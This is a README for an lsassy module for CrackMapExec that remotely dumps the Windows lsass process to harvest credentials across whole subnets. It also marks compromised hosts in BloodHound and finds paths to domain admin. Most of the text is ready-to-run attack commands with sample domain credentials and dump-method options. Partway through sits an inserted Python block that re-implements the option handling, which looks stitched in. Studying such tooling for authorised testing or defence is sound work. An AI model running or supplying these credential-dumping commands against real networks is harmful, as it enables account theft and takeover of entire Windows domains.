
lsassy CrackMapExec Module

This CME module uses lsassy to remotely extract credentials from the lsass process, and optionally interacts with BloodHound to mark compromised hosts as owned and to check whether compromised users have a path to domain admin.

(Screenshot: CME module example)

Requirements

  • CrackMapExec >= 4.0.1

Installation

  • Install lsassy
  • Download the lsassy CrackMapExec module
  • Copy lsassy.py into [CrackMapExec Path]/cme/modules
  • Reinstall CrackMapExec (Python 2.7) using python setup.py install

python3 -m pip install lsassy
wget https://raw.githubusercontent.com/Hackndo/lsassy/master/cme/lsassy.py
cp lsassy.py /opt/CrackMapExec/cme/modules/
cd /opt/CrackMapExec
python setup.py install

Usage

Basic

cme smb 10.10.0.0/24 -d adsec.local -u jsnow -p Winter_is_coming_\! -M lsassy

Advanced

By default, this module uses rundll32.exe with the comsvcs.dll DLL to dump the lsass process on the remote host (lsassy method 1).

If you want to specify the dumping method, use the METHOD option (see lsassy -h for more details).

cme smb 10.10.0.0/24 -d adsec.local -u jsnow -p Winter_is_coming_\! -M lsassy -o METHOD=3

If you're using a method that requires procdump, you can specify the procdump location with the PROCDUMP_PATH option.

cme smb 10.10.0.0/24 -d adsec.local -u jsnow -p Winter_is_coming_\! -M lsassy -o METHOD=2 PROCDUMP_PATH=/opt/Sysinternals/procdump.exe

By default, the lsass dump name is randomly generated. If you want to specify a dump name, use the REMOTE_LSASS_DUMP option.

cme smb 10.10.0.0/24 -d adsec.local -u jsnow -p Winter_is_coming_\! -M lsassy -o REMOTE_LSASS_DUMP=LSASSY_DUMP.dmp

BloodHound

You can enable BloodHound integration with the -o BLOODHOUND=True flag. This flag enables the following checks:

  • Set "owned" on the BloodHound computer nodes that are compromised
  • Detect compromised users that have a path to domain admin

cme smb 10.10.0.0/24 -d adsec.local -u jsnow -p Winter_is_coming_\! -M lsassy -o BLOODHOUND=True

You can list the available options with

cme smb 10.10.0.0/24 -d adsec.local -u jsnow -p Winter_is_coming_\! -M lsassy --options
[*] lsassy module options:

            METHOD              Method to use to dump procdump with lsassy. See lsassy -h for more details
            REMOTE_LSASS_DUMP   Name of the remote lsass dump (default: Random)
            PROCDUMP_PATH       Path to procdump on attacker host. If this is not set, "rundll32" method is used
            BLOODHOUND          Enable Bloodhound integration (default: false)
            NEO4JURI            URI for Neo4j database (default: 127.0.0.1)
            NEO4JPORT           Listeninfg port for Neo4j database (default: 7687)
            NEO4JUSER           Username for Neo4j database (default: 'neo4j')
            NEO4JPASS           Password for Neo4j database (default: 'neo4j')
            WITHOUT_EDGES       List of black listed edges (example: 'SQLAdmin,CanRDP', default: '')
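As an added illustration (not the module's own code), here is how the options listed above map onto their defaults and the two rules given in the text: a method that needs procdump falls back to rundll32 when PROCDUMP_PATH is unset, and the dump name is randomised unless REMOTE_LSASS_DUMP is given. Which methods need procdump is an assumption (only method 2, as in the example above); the names parse_cli_options, resolve_options and path_exists are chosen here.

```python
import os
import secrets

# Defaults as listed in the --options output above; REMOTE_LSASS_DUMP and
# PROCDUMP_PATH have no fixed default (random name / not set).
DEFAULTS = {
    "METHOD": 1, "REMOTE_LSASS_DUMP": None, "PROCDUMP_PATH": None,
    "BLOODHOUND": False, "NEO4JURI": "127.0.0.1", "NEO4JPORT": 7687,
    "NEO4JUSER": "neo4j", "NEO4JPASS": "neo4j", "WITHOUT_EDGES": "",
}
# Assumption: only method 2 (shown with PROCDUMP_PATH above) needs procdump.
PROCDUMP_METHODS = {2}


def parse_cli_options(tokens):
    """Turn the KEY=VALUE tokens given after -o into a dict."""
    parsed = {}
    for token in tokens:
        key, sep, value = token.partition("=")
        if not sep or not key:
            raise ValueError(f"malformed option {token!r}, expected KEY=VALUE")
        parsed[key.upper()] = value
    return parsed


def resolve_options(module_options, path_exists=os.path.isfile):
    """Apply defaults and the rules from the text to the raw option dict."""
    unknown = set(module_options) - set(DEFAULTS)
    if unknown:
        raise ValueError(f"unknown option(s): {sorted(unknown)}")
    opts = dict(DEFAULTS, **module_options)
    opts["METHOD"] = int(opts["METHOD"])
    opts["NEO4JPORT"] = int(opts["NEO4JPORT"])
    opts["BLOODHOUND"] = str(opts["BLOODHOUND"]).lower() in ("true", "1", "yes")
    if opts["PROCDUMP_PATH"] is None:
        if opts["METHOD"] in PROCDUMP_METHODS:
            opts["METHOD"] = 1  # no procdump: fall back to rundll32 (method 1)
    elif not path_exists(opts["PROCDUMP_PATH"]):
        raise FileNotFoundError(f"procdump not found at {opts['PROCDUMP_PATH']}")
    if opts["REMOTE_LSASS_DUMP"] is None:
        opts["REMOTE_LSASS_DUMP"] = secrets.token_hex(6) + ".dmp"  # random name
    # WITHOUT_EDGES is a comma-separated blacklist, e.g. 'SQLAdmin,CanRDP'
    opts["WITHOUT_EDGES"] = [e.strip() for e in opts["WITHOUT_EDGES"].split(",") if e.strip()]
    return opts
```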

Issue

If you find an issue with this tool (that's very plausible!), please:

  • Check that you're using the latest version
  • Send as many details as possible.
    • For standalone lsassy, use the -d debug flag
    • For the CME module, use the CrackMapExec --verbose flag

Have fun
